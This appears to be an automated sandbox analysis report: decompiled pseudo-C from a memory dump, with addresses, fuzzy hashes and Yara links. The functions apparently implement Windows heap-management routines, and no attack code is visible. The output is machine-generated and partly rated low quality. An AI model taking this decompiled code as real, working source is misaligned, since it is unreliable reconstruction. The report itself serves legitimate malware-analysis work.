				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t120 = _t119 + 8;
				_t175 =  *(_t120 + 4);
				_t87 = _t175 >> 5;
				if( *_t120 < _t87 + _t87) {
					L22:
					_t186 = _t175 >> 5;
					_t177 = _v16;
					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
					_v8 = _t90;
					_t137 =  *(_t120 + 8);
					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
					_t67 = _t186 - 1; // 0xffffffdf
					_t164 = _t67 & _v8;
					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
					 *_t120 =  *_t120 + 1;
					_t178 = 0;
					L23:
					 *_v20 =  *_v20 & 0x00000000;
					E1E3BFFB0(_t120, _t178, _v36);
					if(_t178 != 0) {
						E1E46BCD2(_t178,  *0x1e496348,  *0x1e49634c);
					}
					return _v12;
				}
				_t139 = 2;
				_t87 = E1E3DF3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
				if(_t87 < 0) {
					goto L22;
				}
				_t187 = _v8;
				if(_t187 < 4) {
					_t187 = 4;
				}
				_push(0);
				_t87 = E1E460150(_t187 << 2);
				_t179 = _t87;
				_v8 = _t179;
				if(_t179 == 0) {
					_t175 =  *(_t120 + 4);
					if(_t175 >= 0x20) {
						goto L22;
					}
					_v12 = _v12 & 0x00000000;
					_t178 = _v16;
					goto L23;
				} else {
					_t19 = _t187 - 1; // 0x3
					_t141 = _t19;
					if((_t187 & _t141) == 0) {
						L10:
						if(_t187 > 0x4000000) {
							_t187 = 0x4000000;
						}
						_v28 = _v28 & 0x00000000;
						_t167 = _t187 << 2;
						_t107 = _t120 | 0x00000001;
						_v24 = _t179;
						_t168 = _t167 >> 2;
						asm("sbb ecx, ecx");
						_t144 =  !(_t167 + _t179) & _t168;
						if(_t144 <= 0) {
							L15:
							_t180 = 0;
							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
							_v24 = _t170;
							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
								L20:
								_t147 =  *(_t120 + 8);
								_t87 = _v8;
								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
								 *(_t120 + 8) = _t87;
								 *(_t120 + 4) = _t175;
								if( *(_t120 + 8) != 0) {
									_push(0);
									_t87 = E1E460180(_t147);
									_t175 =  *(_t120 + 4);
								}
								goto L22;
							} else {
								goto L16;
							}
							do {
								L16:
								_t121 =  *(_t120 + 8);
								_v32 = _t121;
								while(1) {
									_t148 =  *(_t121 + _t180 * 4);
									_v28 = _t148;
									if((_t148 & 0x00000001) != 0) {
										goto L19;
									}
									 *(_t121 + _t180 * 4) =  *_t148;
									_t124 =  *(_t148 + 4) & _t170;
									_t173 = _v8;
									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
									_t127 = _v28;
									 *_t127 =  *(_t173 + _t154 * 4);
									 *(_t173 + _t154 * 4) = _t127;
									_t170 = _v24;
									_t121 = _v32;
								}
								L19:
								_t180 = _t180 + 1;
								_t120 =  &(_v20[2]);
							} while (_t180 <  *(_t120 + 4) >> 5);
							goto L20;
						} else {
							_t174 = _t179;
							_t183 = _v28;
							do {
								_t183 = _t183 + 1;
								 *_t174 = _t107;
								_t174 =  &(_t174[1]);
							} while (_t183 < _t144);
							goto L15;
						}
					}
					_t155 = _t141 | 0xffffffff;
					if(_t187 == 0) {
						L9:
						_t187 = 1 << _t155;
						goto L10;
					} else {
						goto L8;
					}
					do {
						L8:
						_t155 = _t155 + 1;
						_t187 = _t187 >> 1;
					} while (_t187 != 0);
					goto L9;
				}
			}

0x1e4603e5
0x1e4603eb
0x1e4603ed
0x1e4603ef
0x1e4603f5
0x1e4603f8
0x1e4603fc
0x1e4603ff
0x1e460404
0x1e460406
0x1e46040b
0x1e460619
0x1e460619
0x1e460414
0x1e460417
0x1e46041b
0x1e46041e
0x1e460421
0x1e46042c
0x1e460436
0x1e460438
0x1e46043b
0x1e460440
0x1e460448
0x1e46058e
0x1e460596
0x1e46059b
0x1e4605a0
0x1e4605a3
0x1e4605d1
0x1e4605d6
0x1e4605d9
0x1e4605dc
0x1e4605e2
0x1e4605e4
0x1e4605e7
0x1e4605e9
0x1e4605eb
0x1e4605f1
0x1e4605f4
0x1e4605fb
0x1e46060b
0x1e46060b
0x00000000
0x1e460610
0x1e460450
0x1e460458
0x1e46045f
0x00000000
0x00000000
0x1e460465
0x1e46046b
0x1e46046f
0x1e46046f
0x1e460472
0x1e460478
0x1e46047d
0x1e46047f
0x1e460484
0x1e46061c
0x1e460622
0x00000000
0x00000000
0x1e460628
0x1e46062c
0x00000000
0x1e46048a
0x1e46048a
0x1e46048a
0x1e46048f
0x1e4604a2
0x1e4604a9
0x1e4604ab
0x1e4604ab
0x1e4604ad
0x1e4604b3
0x1e4604b8
0x1e4604bb
0x1e4604c1
0x1e4604c6
0x1e4604ca
0x1e4604cc
0x1e4604dd
0x1e4604e6
0x1e4604e8
0x1e4604f1
0x1e4604f4
0x1e460568
0x1e46056b
0x1e460571
0x1e460577
0x1e460579
0x1e46057c
0x1e460581
0x1e460583
0x1e460586
0x1e46058b
0x1e46058b
0x00000000
0x00000000
0x00000000
0x00000000
0x1e4604f6
0x1e4604f6
0x1e4604f6
0x1e4604f9
0x1e4604fc
0x1e4604fc
0x1e4604ff
0x1e460505
0x00000000
0x00000000
0x1e460509
0x1e46050f
0x1e460532
0x1e460542
0x1e460544
0x1e46054a
0x1e46054c
0x1e46054f
0x1e460552
0x1e460552
0x1e460557
0x1e46055a
0x1e46055b
0x1e460564
0x00000000
0x1e4604ce
0x1e4604ce
0x1e4604d0
0x1e4604d3
0x1e4604d3
0x1e4604d4
0x1e4604d6
0x1e4604d9
0x00000000
0x1e4604d3
0x1e4604cc
0x1e460491
0x1e460496
0x1e46049d
0x1e4604a0
0x00000000
0x00000000
0x00000000
0x00000000
0x1e460498
0x1e460498
0x1e460498
0x1e460499
0x1e460499
0x00000000
0x1e460498

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d46e756e3b3f95407de6c232ccfecdc3a119fcc510b023d854c4b499feed2a69
Instruction ID: e05d21cc52a493ae6752cc70839ee6c47cbaaf77e593a4b18df177096f526b0b
Opcode Fuzzy Hash: d46e756e3b3f95407de6c232ccfecdc3a119fcc510b023d854c4b499feed2a69
Instruction Fuzzy Hash: 3771A576A002159BDB28CF59C8D0B6DBBF2EF88310F15826AD815AF385D775ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E45FA2B, Relevance: .2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 25%

			E1E45FA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0x1e480e38);
				_t98 = E1E3FD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0x1e497bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0x1e45fcfb) & 0x000000ff) * 4 +  &M1E45FCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E1E46A80D(_t168);
				}
				return E1E3FD0D1(_t98);
			}

0x1e45fa2b
0x1e45fa2b
0x1e45fa2d
0x1e45fa32
0x1e45fa37
0x1e45fa3a
0x1e45fa3c
0x1e45fa43
0x1e45fa46
0x1e45fa49
0x1e45fa4f
0x1e45fa55
0x1e45fa58
0x1e45fa5d
0x1e45fa65
0x1e45fa6d
0x1e45fa72
0x1e45fa78
0x1e45fa7e
0x1e45fa8c
0x1e45faa2
0x1e45faa7
0x1e45faaa
0x1e45faaf
0x1e45fac4
0x1e45fab1
0x1e45fac0
0x1e45fac0
0x1e45fac8
0x1e45facb
0x1e45fad5
0x1e45fadb
0x1e45fae1
0x1e45fb05
0x1e45fb05
0x1e45fb08
0x1e45fb0b
0x1e45fb15
0x1e45fb98
0x1e45fb9f
0x1e45fba5
0x1e45fbb4
0x1e45fbb6
0x1e45fbb7
0x1e45fbbd
0x00000000
0x1e45fbbd
0x1e45fb17
0x1e45fb17
0x1e45fb17
0x1e45fb1a
0x1e45fb22
0x1e45fb40
0x1e45fb47
0x1e45fb4c
0x1e45fb4e
0x1e45fb54
0x1e45fb5a
0x1e45fb5a
0x1e45fb60
0x1e45fb66
0x1e45fb6d
0x1e45fb70
0x1e45fb73
0x1e45fb78
0x1e45fb7d
0x1e45fb8c
0x1e45fb90
0x1e45fbbf
0x1e45fbbf
0x1e45fbc6
0x1e45fbcd
0x1e45fc18
0x1e45fc18
0x1e45fc23
0x1e45fc3d
0x1e45fc3d
0x1e45fc25
0x1e45fc25
0x1e45fc2b
0x1e45fc2d
0x1e45fc33
0x00000000
0x00000000
0x1e45fc33
0x1e45fbcf
0x1e45fbd9
0x1e45fbdf
0x1e45fc00
0x1e45fc06
0x1e45fbe1
0x1e45fbe1
0x1e45fbe3
0x1e45fbe9
0x1e45fbf5
0x1e45fbeb
0x1e45fbee
0x1e45fbf0
0x1e45fbf0
0x1e45fbf7
0x1e45fbfb
0x1e45fc09
0x1e45fc10
0x1e45fc16
0x00000000
0x00000000
0x1e45fc16
0x1e45fbcd
0x1e45fb7d
0x1e45fb60
0x1e45fb54
0x1e45fb22
0x1e45fae3
0x1e45fae3
0x1e45faed
0x00000000
0x00000000
0x1e45faed
0x1e45fae1
0x1e45fad5
0x1e45fa8c
0x1e45fc44
0x1e45fc72
0x1e45fc7c
0x1e45fc82
0x1e45fc82
0x1e45fc84
0x1e45fc8a
0x1e45fcca
0x1e45fcca
0x1e45fccb
0x1e45fccc
0x1e45fccf
0x1e45fcd0
0x00000000
0x1e45fc8c
0x1e45fc93
0x00000000
0x1e45fc9a
0x1e45fc9b
0x1e45fc9c
0x1e45fc9f
0x1e45fca0
0x00000000
0x00000000
0x1e45fca4
0x1e45fca5
0x1e45fca6
0x1e45fca9
0x1e45fcaa
0x00000000
0x00000000
0x1e45fcae
0x1e45fcaf
0x1e45fcb0
0x1e45fcb2
0x1e45fcb3
0x00000000
0x00000000
0x1e45fcb7
0x1e45fcb8
0x1e45fcb9
0x1e45fcbc
0x1e45fcbd
0x00000000
0x00000000
0x1e45fcc1
0x1e45fcc2
0x1e45fcc3
0x1e45fcc5
0x1e45fcc6
0x1e45fcd2
0x00000000
0x00000000
0x00000000
0x00000000
0x1e45fc93
0x1e45fcd3
0x1e45fcd5
0x1e45fcd5
0x1e45fcdf

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cec2b97265f4c5d3040a3192b3053e31e68ac88404c8a3ac84f7828d70a6812e
Instruction ID: c08cbc9f8241e6c8b5aa6a6f691dfd8f6b85466a0453b4d3055b9ea5cc95d22e
Opcode Fuzzy Hash: cec2b97265f4c5d3040a3192b3053e31e68ac88404c8a3ac84f7828d70a6812e
Instruction Fuzzy Hash: 34817D709002869FDB09CF59C494AAAF7F2FF48305F5482AAE851EB785D37498C2CF65

Uniqueness

Uniqueness Score: -1.00%

Function 1E46DBD2, Relevance: .2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1E46DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed short _v12;
				signed int _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				signed int _t112;
				signed int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1e496114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L1E46D016(_t119, _t183, _t119, _t78);
									E1E3BFFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E1E46C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x1e38aff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E1E3BFFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E1E46E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x1e38aff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E1E3ED340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E1E46D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E1E46D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E1E46A80D( *_v20, 0x11, _a4, _v16);
					_t172 = 0;
				}
			}

0x1e46dbdc
0x1e46dbde
0x1e46dbe1
0x1e46dbed
0x1e46dbef
0x1e46dbf7
0x1e46dbfd
0x1e46dc00
0x1e46dc04
0x1e46dc07
0x1e46dc0c
0x1e46dd1f
0x1e46dd1f
0x1e46dd23
0x1e46dd26
0x1e46dd29
0x1e46dd29
0x1e46dd2c
0x1e46dd32
0x1e46dd35
0x00000000
0x1e46dd38
0x1e46dd3a
0x1e46dd5d
0x1e46dd63
0x1e46dd69
0x1e46dd6e
0x1e46dd71
0x1e46dd78
0x1e46dd7d
0x1e46dd8c
0x1e46dd9e
0x1e46dda0
0x1e46ddad
0x1e46ddb0
0x1e46ddb5
0x1e46ddb9
0x1e46ddd9
0x1e46ddd9
0x1e46ddde
0x1e46dde0
0x1e46dde3
0x1e46dde5
0x1e46dde9
0x1e46dde9
0x1e46ddee
0x1e46ddf6
0x1e46ddf6
0x1e46dd97
0x00000000
0x00000000
0x1e46dd9b
0x00000000
0x1e46dd9b
0x1e46dd7f
0x00000000
0x1e46dd7f
0x1e46dd3f
0x1e46dd54
0x1e46dd58
0x1e46dd86
0x00000000
0x1e46dd86
0x00000000
0x1e46dd5a
0x1e46dd5a
0x1e46dd5a
0x00000000
0x1e46dd5a
0x1e46dd3f
0x1e46dd38
0x1e46dc12
0x1e46dc15
0x1e46dc25
0x1e46dc31
0x1e46dc34
0x1e46dc3b
0x1e46dc3e
0x1e46dc40
0x1e46dc43
0x1e46dc46
0x1e46dc62
0x1e46dc6b
0x1e46dc6d
0x1e46dc48
0x1e46dc4b
0x1e46dc59
0x1e46dc5c
0x1e46dc5c
0x1e46dc72
0x1e46dc78
0x1e46dc7f
0x1e46dc81
0x1e46dc81
0x1e46dc84
0x1e46dc88
0x1e46dc8d
0x1e46dc95
0x1e46dc9b
0x1e46dca0
0x1e46dca2
0x1e46dca6
0x1e46dca6
0x1e46dcb0
0x1e46dcd1
0x1e46dcd4
0x1e46dcda
0x1e46dcec
0x1e46dcf1
0x1e46dcf6
0x1e46dd0c
0x1e46dd1a
0x1e46dd1a
0x1e46dcf6
0x00000000
0x1e46dcda
0x1e46dcb5
0x1e46dcb6
0x1e46dcc5
0x1e46dcca
0x1e46dcca

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c95ea19a0d12242c765fa67216cf44f23c5ad245df3ed0761039b56f4a7f77
Instruction ID: de7bd1c725eff31b130e7ef5654920bd70037667132363453884c0dfba872d46
Opcode Fuzzy Hash: 42c95ea19a0d12242c765fa67216cf44f23c5ad245df3ed0761039b56f4a7f77
Instruction Fuzzy Hash: A771A875E001695FCB04EF59C8909BEB7F6EF8C310B11426AE895EB345D734D986CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E4728EC, Relevance: .2, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E1E4728EC(signed int __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				unsigned int _t62;
				unsigned int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t77;
				intOrPtr _t85;
				unsigned int _t95;
				signed int _t98;
				signed int _t100;
				void* _t104;
				signed short _t108;
				signed int _t113;
				intOrPtr _t115;
				signed int _t116;
				intOrPtr _t117;
				signed int _t118;
				intOrPtr _t120;
				signed int _t121;
				signed int _t122;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				signed int _t136;
				signed int _t137;
				signed int _t140;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				void* _t156;

				_t115 = _a4;
				_v40 = __edx;
				_t147 = __ecx;
				_v20 = __ecx;
				if(__edx != _t115) {
					_t115 = _t115 + 2;
				}
				_t62 = _t115 + 7 >> 3;
				_t120 = _t62 + 1;
				_v28 = _t120;
				if(( *(_t147 + 0x38) & 0x00000001) != 0) {
					_t120 = _t62 + 2;
					_v28 = _t120;
				}
				_t64 = _t120 + _t120 & 0x0000ffff;
				_t136 = _a8 & 0x00000001;
				_v36 = _t120 + _t120 & 0x0000ffff;
				_v12 = _t136;
				if(_t136 == 0) {
					E1E3C2280(_t64, _t147);
					_t136 = _v12;
				}
				_v5 = 0xff;
				while(1) {
					L7:
					_t121 = 0;
					_t145 =  *(_t147 + 8);
					_v24 =  *(_t147 + 0xc) & 1;
					_v16 = 0;
					if(_t145 == 0) {
						goto L17;
					}
					_t108 =  *0x1e496110; // 0x18e1e984
					_v32 = _t108 & 0x0000ffff;
					do {
						_t156 = _v36 - ( *(_t145 - 4) & 0x0000ffff ^ _t145 - 0x00000004 & 0x0000ffff ^ _v32);
						if(_t156 < 0) {
							__eflags = _v24;
							_t121 = _t145;
							_t113 =  *_t145;
							_v16 = _t121;
							if(_v24 == 0) {
								L15:
								_t145 = _t113;
								goto L16;
							}
							__eflags = _t113;
							if(_t113 == 0) {
								goto L15;
							}
							_t145 = _t145 ^ _t113;
							goto L16;
						}
						if(_t156 <= 0) {
							L18:
							if(_t145 != 0) {
								_t122 =  *0x1e496110; // 0x18e1e984
								_t36 = _t145 - 4; // -4
								_t116 = _t36;
								_t137 = _t116;
								_t69 =  *_t116 ^ _t122 ^ _t116;
								__eflags = _t69;
								if(_t69 >= 0) {
									_t71 = _t69 >> 0x00000010 & 0x00007fff;
									__eflags = _t71;
									if(_t71 == 0) {
										L36:
										_t72 = 0;
										__eflags = 0;
										L37:
										_t139 = _t137 - (_t72 << 0x0000000c) & 0xfffff000;
										__eflags = (0x0000abed ^  *((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x16)) -  *((intOrPtr*)((_t137 - (_t72 << 0x0000000c) & 0xfffff000) + 0x14));
										if(__eflags == 0) {
											_t77 = E1E4725DD(_t147, _t139, __eflags, _t116, _v28, _a8,  &_v5);
											__eflags = _t77;
											if(_t77 == 0) {
												L39:
												_t148 = 0;
												__eflags = _v12;
												if(_v12 != 0) {
													L42:
													return _t148;
												}
												E1E3BFFB0(_t116, _t145, _v20);
												L41:
												_t148 = 0;
												__eflags = 0;
												goto L42;
											}
											_t46 = _t116 + 8; // 0x4
											_t148 = _t46;
											_t140 = (( *_t116 ^  *0x1e496110 ^ _t116) >> 0x00000001 & 0x00007fff) * 8 - 8;
											_t85 = _v20;
											__eflags =  *(_t85 + 0x38) & 0x00000001;
